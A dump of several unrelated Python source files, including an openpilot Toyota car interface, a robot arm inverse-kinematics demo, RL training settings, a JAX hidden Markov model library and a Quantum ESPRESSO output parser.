k (int): kpoint number (0-indexed!)
s (int): spin number (0-indexed!)
fileprefix (string, ""): first part of the file name
dim (numpy array of 3 ints, None): dimensions of the FFT grid
scale (scalar, 1): number to multiply the realspace wavefunction by.
For example, VASP multiplies charge density by the volume
of the structure.
Returns:
A 3D array (indexed by x,y,z where x,y,z are fractional coordinates)
with complex double values for the realspace wavefunction
The charge density is written with z the slow index.
"""
self.check_c_projectors()
if dim is not None:
self.update_dim(np.array(dim))
res = self._write_realspace_density(filename, scale)
self._convert_to_vasp_volumetric(filename, self.dim)
return res
|
py | 1a4b91ab989ca6dd9af3810da8e590c4f8faf4dc | #!/usr/bin/env python
from common.realtime import sec_since_boot
from cereal import car
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.drive_helpers import EventTypes as ET, create_event
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.car.toyota.carstate import CarState, get_can_parser, get_cam_can_parser
from selfdrive.car.toyota.values import ECU, check_ecu_msgs, CAR, NO_STOP_TIMER_CAR
from selfdrive.swaglog import cloudlog
try:
from selfdrive.car.toyota.carcontroller import CarController
except ImportError:
CarController = None
class CarInterface(object):
def __init__(self, CP, sendcan=None):
self.CP = CP
self.VM = VehicleModel(CP)
self.frame = 0
self.gas_pressed_prev = False
self.brake_pressed_prev = False
self.can_invalid_count = 0
self.cam_can_valid_count = 0
self.cruise_enabled_prev = False
# *** init the major players ***
self.CS = CarState(CP)
self.cp = get_can_parser(CP)
self.cp_cam = get_cam_can_parser(CP)
self.forwarding_camera = False
# sending if read only is False
if sendcan is not None:
self.sendcan = sendcan
self.CC = CarController(self.cp.dbc_name, CP.carFingerprint, CP.enableCamera, CP.enableDsu, CP.enableApgs)
@staticmethod
def compute_gb(accel, speed):
return float(accel) / 3.0
@staticmethod
def calc_accel_override(a_ego, a_target, v_ego, v_target):
return 1.0
@staticmethod
def get_params(candidate, fingerprint):
# kg of standard extra cargo to count for drive, gas, etc...
std_cargo = 136
ret = car.CarParams.new_message()
ret.carName = "toyota"
ret.carFingerprint = candidate
ret.safetyModel = car.CarParams.SafetyModels.toyota
# pedal
ret.enableCruise = not ret.enableGasInterceptor
# FIXME: hardcoding honda civic 2016 touring params so they can be used to
# scale unknown params for other cars
mass_civic = 2923 * CV.LB_TO_KG + std_cargo
wheelbase_civic = 2.70
centerToFront_civic = wheelbase_civic * 0.4
centerToRear_civic = wheelbase_civic - centerToFront_civic
rotationalInertia_civic = 2500
tireStiffnessFront_civic = 192150
tireStiffnessRear_civic = 202500
ret.steerActuatorDelay = 0.12 # Default delay, Prius has larger delay
if candidate != CAR.PRIUS:
ret.lateralTuning.init('pid')
ret.lateralTuning.pid.kiBP, ret.lateralTuning.pid.kpBP = [[0.], [0.]]
if candidate == CAR.PRIUS:
stop_and_go = True
ret.safetyParam = 66 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.70
ret.steerRatio = 16.00 # unknown end-to-end spec
tire_stiffness_factor = 1.0 # hand-tune
ret.mass = 3375 * CV.LB_TO_KG + std_cargo
ret.lateralTuning.init('indi')
ret.lateralTuning.indi.innerLoopGain = 4.75
ret.lateralTuning.indi.outerLoopGain = 2.0
ret.lateralTuning.indi.timeConstant = 3.0
ret.lateralTuning.indi.actuatorEffectiveness = 1.5
ret.steerActuatorDelay = 0.5
ret.steerRateCost = 0.5
elif candidate in [CAR.RAV4, CAR.RAV4H]:
stop_and_go = True if (candidate in CAR.RAV4H) else False
ret.safetyParam = 73 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.65
ret.steerRatio = 16.30 # 14.5 is spec end-to-end
tire_stiffness_factor = 0.5533
ret.mass = 3650 * CV.LB_TO_KG + std_cargo # mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.05]]
ret.lateralTuning.pid.kf = 0.00006 # full torque for 10 deg at 80mph means 0.00007818594
elif candidate == CAR.COROLLA:
stop_and_go = False
ret.safetyParam = 100 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.70
ret.steerRatio = 17.8
tire_stiffness_factor = 0.444
ret.mass = 2860 * CV.LB_TO_KG + std_cargo # mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]]
ret.lateralTuning.pid.kf = 0.00003 # full torque for 20 deg at 80mph means 0.00007818594
elif candidate == CAR.LEXUS_RXH:
stop_and_go = True
ret.safetyParam = 100 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.79
ret.steerRatio = 16. # 14.8 is spec end-to-end
tire_stiffness_factor = 0.444 # not optimized yet
ret.mass = 4481 * CV.LB_TO_KG + std_cargo # mean between min and max
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.1]]
ret.lateralTuning.pid.kf = 0.00006 # full torque for 10 deg at 80mph means 0.00007818594
elif candidate in [CAR.CHR, CAR.CHRH]:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.63906
ret.steerRatio = 13.6
tire_stiffness_factor = 0.7933
ret.mass = 3300. * CV.LB_TO_KG + std_cargo
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.723], [0.0428]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate in [CAR.CAMRY, CAR.CAMRYH]:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.82448
ret.steerRatio = 13.7
tire_stiffness_factor = 0.7933
ret.mass = 3400 * CV.LB_TO_KG + std_cargo #mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.1]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate in [CAR.HIGHLANDER, CAR.HIGHLANDERH]:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.78
ret.steerRatio = 16.0
tire_stiffness_factor = 0.444 # not optimized yet
ret.mass = 4607 * CV.LB_TO_KG + std_cargo #mean between normal and hybrid limited
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.05]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate == CAR.AVALON:
stop_and_go = False
ret.safetyParam = 73 # see conversion factor for STEER_TORQUE_EPS in dbc file
ret.wheelbase = 2.82
ret.steerRatio = 14.8 #Found at https://pressroom.toyota.com/releases/2016+avalon+product+specs.download
tire_stiffness_factor = 0.7983
ret.mass = 3505 * CV.LB_TO_KG + std_cargo # mean between normal and hybrid
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.17], [0.03]]
ret.lateralTuning.pid.kf = 0.00006
elif candidate == CAR.RAV4_2019:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.68986
ret.steerRatio = 14.3
tire_stiffness_factor = 0.7933
ret.mass = 3370. * CV.LB_TO_KG + std_cargo
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.05]]
ret.lateralTuning.pid.kf = 0.00007818594
elif candidate == CAR.COROLLA_HATCH:
stop_and_go = True
ret.safetyParam = 100
ret.wheelbase = 2.63906
ret.steerRatio = 13.9
tire_stiffness_factor = 0.444
ret.mass = 3060. * CV.LB_TO_KG + std_cargo
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.05]]
ret.lateralTuning.pid.kf = 0.00007818594
ret.steerRateCost = 1.
ret.centerToFront = ret.wheelbase * 0.44
#detect the Pedal address
ret.enableGasInterceptor = 0x201 in fingerprint
# min speed to enable ACC. if car can do stop and go, then set enabling speed
# to a negative value, so it won't matter.
ret.minEnableSpeed = -1. if (stop_and_go or ret.enableGasInterceptor) else 19. * CV.MPH_TO_MS
centerToRear = ret.wheelbase - ret.centerToFront
# TODO: get actual value, for now starting with reasonable value for
# civic and scaling by mass and wheelbase
ret.rotationalInertia = rotationalInertia_civic * \
ret.mass * ret.wheelbase**2 / (mass_civic * wheelbase_civic**2)
# TODO: start from empirically derived lateral slip stiffness for the civic and scale by
# mass and CG position, so all cars will have approximately similar dyn behaviors
ret.tireStiffnessFront = (tireStiffnessFront_civic * tire_stiffness_factor) * \
ret.mass / mass_civic * \
(centerToRear / ret.wheelbase) / (centerToRear_civic / wheelbase_civic)
ret.tireStiffnessRear = (tireStiffnessRear_civic * tire_stiffness_factor) * \
ret.mass / mass_civic * \
(ret.centerToFront / ret.wheelbase) / (centerToFront_civic / wheelbase_civic)
# no rear steering, at least on the listed cars above
ret.steerRatioRear = 0.
ret.steerControlType = car.CarParams.SteerControlType.torque
# steer, gas, brake limitations VS speed
ret.steerMaxBP = [16. * CV.KPH_TO_MS, 45. * CV.KPH_TO_MS] # breakpoints at 1 and 40 kph
ret.steerMaxV = [1., 1.] # 2/3rd torque allowed above 45 kph
ret.brakeMaxBP = [5., 20.]
ret.brakeMaxV = [1., 0.8]
ret.enableCamera = not check_ecu_msgs(fingerprint, ECU.CAM)
ret.enableDsu = not check_ecu_msgs(fingerprint, ECU.DSU)
ret.enableApgs = False #not check_ecu_msgs(fingerprint, ECU.APGS)
ret.openpilotLongitudinalControl = ret.enableCamera and ret.enableDsu
cloudlog.warn("ECU Camera Simulated: %r", ret.enableCamera)
cloudlog.warn("ECU DSU Simulated: %r", ret.enableDsu)
cloudlog.warn("ECU APGS Simulated: %r", ret.enableApgs)
cloudlog.warn("ECU Gas Interceptor: %r", ret.enableGasInterceptor)
ret.steerLimitAlert = False
ret.longitudinalTuning.deadzoneBP = [0., 9.]
ret.longitudinalTuning.deadzoneV = [0., .15]
ret.longitudinalTuning.kpBP = [0., 5., 35.]
ret.longitudinalTuning.kiBP = [0., 35.]
ret.stoppingControl = False
ret.startAccel = 0.0
if ret.enableGasInterceptor:
ret.gasMaxBP = [0., 9., 35]
ret.gasMaxV = [0.2, 0.5, 0.7]
ret.longitudinalTuning.kpV = [1.2, 0.8, 0.5]
ret.longitudinalTuning.kiV = [0.18, 0.12]
else:
ret.gasMaxBP = [0.]
ret.gasMaxV = [0.5]
ret.longitudinalTuning.kpV = [3.6, 2.4, 1.5]
ret.longitudinalTuning.kiV = [0.54, 0.36]
return ret
# returns a car.CarState
def update(self, c):
# ******************* do can recv *******************
canMonoTimes = []
self.cp.update(int(sec_since_boot() * 1e9), False)
# run the cam can update for 10s as we just need to know if the camera is alive
if self.frame < 1000:
self.cp_cam.update(int(sec_since_boot() * 1e9), False)
self.CS.update(self.cp, self.cp_cam)
# create message
ret = car.CarState.new_message()
# speeds
ret.vEgo = self.CS.v_ego
ret.vEgoRaw = self.CS.v_ego_raw
ret.aEgo = self.CS.a_ego
ret.yawRate = self.VM.yaw_rate(self.CS.angle_steers * CV.DEG_TO_RAD, self.CS.v_ego)
ret.standstill = self.CS.standstill
ret.wheelSpeeds.fl = self.CS.v_wheel_fl
ret.wheelSpeeds.fr = self.CS.v_wheel_fr
ret.wheelSpeeds.rl = self.CS.v_wheel_rl
ret.wheelSpeeds.rr = self.CS.v_wheel_rr
# gear shifter
ret.gearShifter = self.CS.gear_shifter
# gas pedal
ret.gas = self.CS.car_gas
if self.CP.enableGasInterceptor:
# use interceptor values to disengage on pedal press
ret.gasPressed = self.CS.pedal_gas > 15
else:
ret.gasPressed = self.CS.pedal_gas > 0
# brake pedal
ret.brake = self.CS.user_brake
ret.brakePressed = self.CS.brake_pressed != 0
ret.brakeLights = self.CS.brake_lights
# steering wheel
ret.steeringAngle = self.CS.angle_steers
ret.steeringRate = self.CS.angle_steers_rate
ret.steeringTorque = self.CS.steer_torque_driver
ret.steeringPressed = self.CS.steer_override
# cruise state
ret.cruiseState.enabled = self.CS.pcm_acc_active
ret.cruiseState.speed = self.CS.v_cruise_pcm * CV.KPH_TO_MS
ret.cruiseState.available = bool(self.CS.main_on)
ret.cruiseState.speedOffset = 0.
if self.CP.carFingerprint in NO_STOP_TIMER_CAR or self.CP.enableGasInterceptor:
# ignore standstill in hybrid vehicles, since pcm allows to restart without
# receiving any special command
# also if interceptor is detected
ret.cruiseState.standstill = False
else:
ret.cruiseState.standstill = self.CS.pcm_acc_status == 7
buttonEvents = []
if self.CS.left_blinker_on != self.CS.prev_left_blinker_on:
be = car.CarState.ButtonEvent.new_message()
be.type = 'leftBlinker'
be.pressed = self.CS.left_blinker_on != 0
buttonEvents.append(be)
if self.CS.right_blinker_on != self.CS.prev_right_blinker_on:
be = car.CarState.ButtonEvent.new_message()
be.type = 'rightBlinker'
be.pressed = self.CS.right_blinker_on != 0
buttonEvents.append(be)
ret.buttonEvents = buttonEvents
ret.leftBlinker = bool(self.CS.left_blinker_on)
ret.rightBlinker = bool(self.CS.right_blinker_on)
ret.doorOpen = not self.CS.door_all_closed
ret.seatbeltUnlatched = not self.CS.seatbelt
ret.genericToggle = self.CS.generic_toggle
# events
events = []
if not self.CS.can_valid:
self.can_invalid_count += 1
if self.can_invalid_count >= 5:
events.append(create_event('commIssue', [ET.NO_ENTRY, ET.IMMEDIATE_DISABLE]))
else:
self.can_invalid_count = 0
if self.CS.cam_can_valid:
self.cam_can_valid_count += 1
if self.cam_can_valid_count >= 5:
self.forwarding_camera = True
if not ret.gearShifter == 'drive' and self.CP.enableDsu:
events.append(create_event('wrongGear', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if ret.doorOpen:
events.append(create_event('doorOpen', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if ret.seatbeltUnlatched:
events.append(create_event('seatbeltNotLatched', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if self.CS.esp_disabled and self.CP.enableDsu:
events.append(create_event('espDisabled', [ET.NO_ENTRY, ET.SOFT_DISABLE]))
if not self.CS.main_on and self.CP.enableDsu:
events.append(create_event('wrongCarMode', [ET.NO_ENTRY, ET.USER_DISABLE]))
if ret.gearShifter == 'reverse' and self.CP.enableDsu:
events.append(create_event('reverseGear', [ET.NO_ENTRY, ET.IMMEDIATE_DISABLE]))
if self.CS.steer_error:
events.append(create_event('steerTempUnavailable', [ET.NO_ENTRY, ET.WARNING]))
if self.CS.low_speed_lockout and self.CP.enableDsu:
events.append(create_event('lowSpeedLockout', [ET.NO_ENTRY, ET.PERMANENT]))
if ret.vEgo < self.CP.minEnableSpeed and self.CP.enableDsu:
events.append(create_event('speedTooLow', [ET.NO_ENTRY]))
if c.actuators.gas > 0.1:
# some margin on the actuator to not false trigger cancellation while stopping
events.append(create_event('speedTooLow', [ET.IMMEDIATE_DISABLE]))
if ret.vEgo < 0.001:
# while in standstill, send a user alert
events.append(create_event('manualRestart', [ET.WARNING]))
# enable request in prius is simple, as we activate when Toyota is active (rising edge)
if ret.cruiseState.enabled and not self.cruise_enabled_prev:
events.append(create_event('pcmEnable', [ET.ENABLE]))
elif not ret.cruiseState.enabled:
events.append(create_event('pcmDisable', [ET.USER_DISABLE]))
# disable on pedals rising edge or when brake is pressed and speed isn't zero
if (ret.gasPressed and not self.gas_pressed_prev) or \
(ret.brakePressed and (not self.brake_pressed_prev or ret.vEgo > 0.001)):
events.append(create_event('pedalPressed', [ET.NO_ENTRY, ET.USER_DISABLE]))
if ret.gasPressed:
events.append(create_event('pedalPressed', [ET.PRE_ENABLE]))
ret.events = events
ret.canMonoTimes = canMonoTimes
self.gas_pressed_prev = ret.gasPressed
self.brake_pressed_prev = ret.brakePressed
self.cruise_enabled_prev = ret.cruiseState.enabled
return ret.as_reader()
# pass in a car.CarControl
# to be called @ 100hz
def apply(self, c):
self.CC.update(self.sendcan, c.enabled, self.CS, self.frame,
c.actuators, c.cruiseControl.cancel, c.hudControl.visualAlert,
c.hudControl.audibleAlert, self.forwarding_camera,
c.hudControl.leftLaneVisible, c.hudControl.rightLaneVisible, c.hudControl.leadVisible,
c.hudControl.leftLaneDepart, c.hudControl.rightLaneDepart)
self.frame += 1
return False
|
py | 1a4b91c2724d6430fc13323f298fd60c9fd52820 | import swift # instantiate 3D browser-based visualizer
import roboticstoolbox as rtb
from spatialmath import SE3
import numpy as np
env = swift.Swift()
env.launch(realtime=True) # activate it
robot = rtb.models.Panda()
robot.q = robot.qr
T = SE3(0.5, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])
sol = robot.ikine_LM(T) # solve IK
q_pickup = sol.q
qt = rtb.jtraj(robot.qr, q_pickup, 50)
env.add(robot) # add robot to the 3D scene
for qk in qt.q: # for each joint configuration on trajectory
robot.q = qk # update the robot state
# robot.q = robot.qr
env.step(0.05) # update visualization
env.hold()
|
py | 1a4b91e5c45fbabde348484b072f16fd434da902 | """
This file contains the hyperparameter values used for training and
testing RL agents.
"""
import os
BASE_DIR = './results/'
ENV_ID = 'gym_anm:ANM6Easy-v0'
GAMMA = 0.995
POLICY = 'MlpPolicy'
TRAIN_STEPS = 3000000
MAX_TRAINING_EP_LENGTH = 5000
EVAL_FREQ = 10000
N_EVAL_EPISODES = 5
MAX_EVAL_EP_LENGTH = 3000
LOG_DIR = BASE_DIR + ENV_ID + '/'
os.makedirs(LOG_DIR, exist_ok=True)
# Create a new directory for this run.
i = 0
while os.path.isdir(LOG_DIR + f'run_{i}/'):
i += 1
LOG_DIR += f'run_{i}/'
os.makedirs(LOG_DIR, exist_ok=True)
TENSORBOARD_LOG = LOG_DIR + 'tensorboard/'
os.makedirs(TENSORBOARD_LOG, exist_ok=True)
TB_LOG_NAME = 'run'
if __name__ == '__main__':
print('Done.')
|
py | 1a4b925fae65b3af676ad86702a3e7c34af6b0c9 | '''
Generalizes hmm_discrete_lib so it can handle any kind of observation distribution (eg Gaussian, Poisson, GMM, product of
Bernoullis). It is based on https://github.com/probml/pyprobml/blob/master/scripts/hmm_lib.py
and operates within the log space.
Author : Aleyna Kara(@karalleyna)
'''
from jax.random import split
import jax.numpy as jnp
from jax import jit, lax, vmap
from jax.nn import logsumexp, log_softmax, one_hot
from functools import partial
import superimport
import flax
import distrax
'''
Hidden Markov Model class in which trans_dist and init_dist are categorical-like
distribution from distrax, and obs_dist is any instance of distrax.Distribution.
The functions of optimizers expect that the type of its parameters
is pytree. So, they cannot work on a vanilla dataclass. To see more:
https://github.com/google/jax/issues/2371
Since the flax.dataclass is registered pytree beforehand, it facilitates to use
jit, vmap and optimizers on the hidden markov model.
'''
@flax.struct.dataclass
class HMM:
trans_dist: distrax.Distribution
obs_dist: distrax.Distribution
init_dist: distrax.Distribution
def logdotexp(u, v, axis=-1):
'''
Calculates jnp.log(jnp.exp(u) * jnp.exp(v)) in a stable way.
Parameters
----------
u : array
v : array
axis : int
Returns
-------
* array
Logarithm of the Hadamard product of u and v
'''
max_u = jnp.max(u, axis=axis, keepdims=True)
max_v = jnp.max(v, axis=axis, keepdims=True)
diff_u = jnp.nan_to_num(u - max_u, -jnp.inf)
diff_v = jnp.nan_to_num(v - max_v, -jnp.inf)
u_dot_v = jnp.log(jnp.exp(diff_u) * jnp.exp(diff_v))
u_dot_v = u_dot_v + max_u + max_v
return u_dot_v
def log_normalize(u, axis=-1):
'''
Normalizes the values within the axis in a way that the exponential of each values within the axis
sums up to 1.
Parameters
----------
u : array
axis : int
Returns
-------
* array
The Log of normalized version of the given matrix
* array(seq_len, n_hidden) :
The values of the normalizer
'''
c = logsumexp(u, axis=axis)
return jnp.where(u == -jnp.inf, -jnp.inf, u - c), c
@partial(jit, static_argnums=(1,))
def hmm_sample_log(params, seq_len, rng_key):
'''
Samples an observation of given length according to the defined
hidden markov model and gives the sequence of the hidden states
as well as the observation.
Parameters
----------
params : HMM
Hidden Markov Model
seq_len: array(seq_len)
The length of the observation sequence
rng_key : array
Random key of shape (2,) and dtype uint32
Returns
-------
* array(seq_len,)
Hidden state sequence
* array(seq_len,) :
Observation sequence
'''
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
rng_key, rng_init = split(rng_key)
initial_state = init_dist.sample(seed=rng_init)
def draw_state(prev_state, key):
state = trans_dist.sample(seed=key)[prev_state]
return state, state
rng_key, rng_state, rng_obs = split(rng_key, 3)
keys = split(rng_state, seq_len - 1)
final_state, states = lax.scan(draw_state, initial_state, keys)
states = jnp.append(initial_state, states)
def draw_obs(z, key):
return obs_dist.sample(seed=key)[z]
keys = split(rng_obs, seq_len)
obs_seq = vmap(draw_obs, in_axes=(0, 0))(states, keys)
return states, obs_seq
@jit
def hmm_forwards_log(params, obs_seq, length=None):
'''
Calculates a belief state
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len)
History of observable events
Returns
-------
* float
The loglikelihood giving log(p(x|model))
* array(seq_len, n_hidden) :
Log of alpha values
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
n_states = obs_dist.batch_shape[0]
def scan_fn(carry, t):
(alpha_prev, log_ll_prev) = carry
alpha_n = jnp.where(t < length,
obs_dist.log_prob(obs_seq[t]) + logsumexp(
logdotexp(alpha_prev[:, None], trans_dist.logits), axis=0),
-jnp.inf + jnp.zeros_like(alpha_prev))
alpha_n, cn = log_normalize(alpha_n)
carry = (alpha_n, cn + log_ll_prev)
return carry, alpha_n
# initial belief state
alpha_0, c0 = log_normalize(init_dist.logits + obs_dist.log_prob(obs_seq[0]))
# setup scan loop
init_state = (alpha_0, c0)
ts = jnp.arange(1, seq_len)
carry, alpha_hist = lax.scan(scan_fn, init_state, ts)
# post-process
alpha_hist = jnp.vstack([alpha_0.reshape(1, n_states), alpha_hist])
(alpha_final, log_ll) = carry
return log_ll, alpha_hist
@jit
def hmm_backwards_log(params, obs_seq, length=None):
'''
Computes the backwards probabilities
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len,)
History of observable events
length : array(seq_len,)
The valid length of the observation sequence
Returns
-------
* array(seq_len, n_states)
Log of beta values
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
n_states = trans_dist.batch_shape[0]
beta_t = jnp.zeros((n_states,))
def scan_fn(beta_prev, t):
beta_t = jnp.where(t > length,
-jnp.inf + jnp.zeros_like(beta_prev),
log_normalize(logsumexp(beta_prev + obs_dist.log_prob(obs_seq[-t + 1]) + trans_dist.logits,
axis=1))[0])
return beta_t, beta_t
ts = jnp.arange(2, seq_len + 1)
_, beta_hist = lax.scan(scan_fn, beta_t, ts)
beta_hist = jnp.flip(jnp.vstack([beta_t.reshape(1, n_states), beta_hist]), axis=0)
return beta_hist
@jit
def hmm_forwards_backwards_log(params, obs_seq, length=None):
'''
Computes, for each time step, the marginal conditional probability that the Hidden Markov Model was
in each possible state given the observations that were made at each time step, i.e.
P(z[i] | x[0], ..., x[num_steps - 1]) for all i from 0 to num_steps - 1
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len)
History of observed states
Returns
-------
* array(seq_len, n_states)
The log of alpha values
* array(seq_len, n_states)
The log of beta values
* array(seq_len, n_states)
The log of marginal conditional probability
* float
The loglikelihood giving log(p(x|model))
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
def gamma_t(t):
gamma_t = jnp.where(t < length,
alpha[t] + beta[t - length],
jnp.zeros((n_states,)))
return gamma_t
ll, alpha = hmm_forwards_log(params, obs_seq, length)
n_states = alpha.shape[1]
beta = hmm_backwards_log(params, obs_seq, length)
ts = jnp.arange(seq_len)
gamma = vmap(gamma_t, (0))(ts)
# gamma = alpha * jnp.roll(beta, -seq_len + length, axis=0) #: Alternative
gamma = vmap(lambda x: log_normalize(x, axis=0)[0])(gamma)
return alpha, beta, gamma, ll
@jit
def hmm_viterbi_log(params, obs_seq, length=None):
'''
Computes, for each time step, the marginal conditional probability that the Hidden Markov Model was
in each possible state given the observations that were made at each time step, i.e.
P(z[i] | x[0], ..., x[num_steps - 1]) for all i from 0 to num_steps - 1
It is based on https://github.com/deepmind/distrax/blob/master/distrax/_src/utils/hmm.py
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len)
History of observed states
Returns
-------
* array(seq_len, n_states)
Alpha values
* array(seq_len, n_states)
Beta values
* array(seq_len, n_states)
Marginal conditional probability
* float
The loglikelihood giving log(p(x|model))
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
trans_log_probs = log_softmax(trans_dist.logits)
init_log_probs = log_softmax(init_dist.logits)
n_states = obs_dist.batch_shape[0]
first_log_prob = init_log_probs + obs_dist.log_prob(obs_seq[0])
if seq_len == 1:
return jnp.expand_dims(jnp.argmax(first_log_prob), axis=0)
def viterbi_forward(prev_logp, t):
obs_logp = obs_dist.log_prob(obs_seq[t])
logp = jnp.where(t <= length,
prev_logp[..., None] + trans_log_probs + obs_logp[..., None, :],
-jnp.inf + jnp.zeros_like(trans_log_probs))
max_logp_given_successor = jnp.where(t <= length, jnp.max(logp, axis=-2), prev_logp)
most_likely_given_successor = jnp.where(t <= length, jnp.argmax(logp, axis=-2), -1)
return max_logp_given_successor, most_likely_given_successor
ts = jnp.arange(1, seq_len)
final_log_prob, most_likely_sources = lax.scan(viterbi_forward, first_log_prob, ts)
most_likely_initial_given_successor = jnp.argmax(
trans_log_probs + first_log_prob, axis=-2)
most_likely_sources = jnp.concatenate([
jnp.expand_dims(most_likely_initial_given_successor, axis=0),
most_likely_sources], axis=0)
def viterbi_backward(state, t):
state = jnp.where(t <= length,
jnp.sum(most_likely_sources[t] * one_hot(state, n_states)).astype(jnp.int64),
state)
most_likely = jnp.where(t <= length, state, -1)
return state, most_likely
final_state = jnp.argmax(final_log_prob)
_, most_likely_path = lax.scan(viterbi_backward, final_state, ts, reverse=True)
final_state = jnp.where(length == seq_len, final_state, -1)
return jnp.append(most_likely_path, final_state)
|
py | 1a4b926977f46de6f98472226aaa5d3b9b4737c2 | '''
Collect results in Quantum ESPRESSO
'''
import sys
import numpy as np
from pymatgen.core import Structure
from . import structure as qe_structure
from ... import utility
from ...IO import pkl_data
from ...IO import read_input as rin
def collect_qe(current_id, work_path):
# ---------- check optimization in previous stage
try:
with open(work_path+rin.qe_outfile, 'r') as fpout:
lines = fpout.readlines()
check_opt = 'not_yet'
for line in lines:
if 'End final coordinates' in line:
check_opt = 'done'
except Exception as e:
print(e)
check_opt = 'no_file'
# ---------- obtain energy and magmom
try:
with open(work_path+rin.qe_outfile, 'r') as fpout:
lines = fpout.readlines()
energy = np.nan
for line in reversed(lines):
if line.startswith('!'):
energy = float(line.split()[-2]) # in Ry
energy = energy * utility.ry2ev / float(rin.natot) # Ry/cell --> eV/atom
break
magmom = np.nan # implemented by H. Sawahata 2020/10/04
for line in reversed(lines):
if line.find("total magnetization") >= 0:
muB = line.split()
magmom = float(muB[3])
break
except Exception as e:
energy = np.nan # error
magmom = np.nan # error
print(e)
print(' Structure ID {0}, could not obtain energy from {1}'.format(
current_id, rin.qe_outfile))
# ---------- collect the last structure
try:
lines_cell = qe_structure.extract_cell_parameters(
work_path+rin.qe_outfile)
if lines_cell is None:
lines_cell = qe_structure.extract_cell_parameters(
work_path+rin.qe_infile)
lines_atom = qe_structure.extract_atomic_positions(
work_path+rin.qe_outfile)
if lines_atom is None:
lines_atom = qe_structure.extract_atomic_positions(
work_path+rin.qe_infile)
opt_struc = qe_structure.from_lines(lines_cell, lines_atom)
# ------ opt_qe-structure
with open('./data/opt_qe-structure', 'a') as fstruc:
fstruc.write('# ID {0:d}\n'.format(current_id))
qe_structure.write(opt_struc, './data/opt_qe-structure', mode='a')
except Exception as e:
print(e)
opt_struc = None
# ---------- check
if np.isnan(energy):
opt_struc = None
if opt_struc is None:
energy = np.nan
magmom = np.nan
# ---------- return
return opt_struc, energy, magmom, check_opt
def get_energy_step_qe(energy_step_data, current_id, work_path):
'''
get energy step data in eV/atom
energy_step_data[ID][stage][step]
energy_step_data[ID][0] <-- stage 1
energy_step_data[ID][1] <-- stage 2
'''
try:
# ---------- read output file
with open(work_path+rin.qe_outfile, 'r') as f:
lines = f.readlines()
# ---------- get energy step
energy_step = []
final_flag = False # End final coordinates
vc_flag = False # vc-relax
for line in lines:
if line.startswith('!'):
energy_step.append(line.split()[4])
# ------ check opt and vc-relax
if 'End final coordinates' in line:
final_flag = True
if 'CELL_PARAMETERS' in line:
vc_flag = True
# ------ delete last energy (after End final coordinates)
if final_flag and vc_flag:
energy_step.pop(-1)
# ------ list --> array, Ry/cell --> eV/atom
if not energy_step:
energy_step = None # if empty
print('#### ID: {0}: failed to parse energy_step\n'.format(
current_id), file=sys.stderr)
else:
energy_step = utility.ry2ev / rin.natot * np.array(energy_step,
dtype='float')
except Exception as e:
energy_step = None
print(e, '#### ID: {0}: failed to parse energy_step\n'.format(
current_id), file=sys.stderr)
# ---------- append energy_step
if energy_step_data.get(current_id) is None:
energy_step_data[current_id] = [] # initialize
energy_step_data[current_id].append(energy_step)
# ---------- save energy_step_data
pkl_data.save_energy_step(energy_step_data)
# ---------- return
return energy_step_data
def get_struc_step_qe(struc_step_data, current_id, work_path):
'''
get structure step data
# ---------- args
struc_step_data: (dict) the key is structure ID
struc_step_data[ID][stage][step]
struc_step_data[ID][0] <-- stage 1
struc_step_data[ID][1] <-- stage 2
'''
try:
struc_step = []
# ------ init struc from pwscf.in
_extract_struc_qe(work_path+rin.qe_infile, struc_step)
# ------ struc step from pwscf.out
_extract_struc_qe(work_path+rin.qe_outfile, struc_step)
# ------ delete last structure due to duplication
struc_step.pop(-1)
except Exception as e:
struc_step = None
print(e ,'#### ID: {0}: failed to parse in struc_step\n'.format(
current_id), file=sys.stderr)
# ---------- append struc_step_data
if struc_step_data.get(current_id) is None:
struc_step_data[current_id] = [] # initialize
struc_step_data[current_id].append(struc_step)
# ---------- save struc_step_data
pkl_data.save_struc_step(struc_step_data)
# ---------- return
return struc_step_data
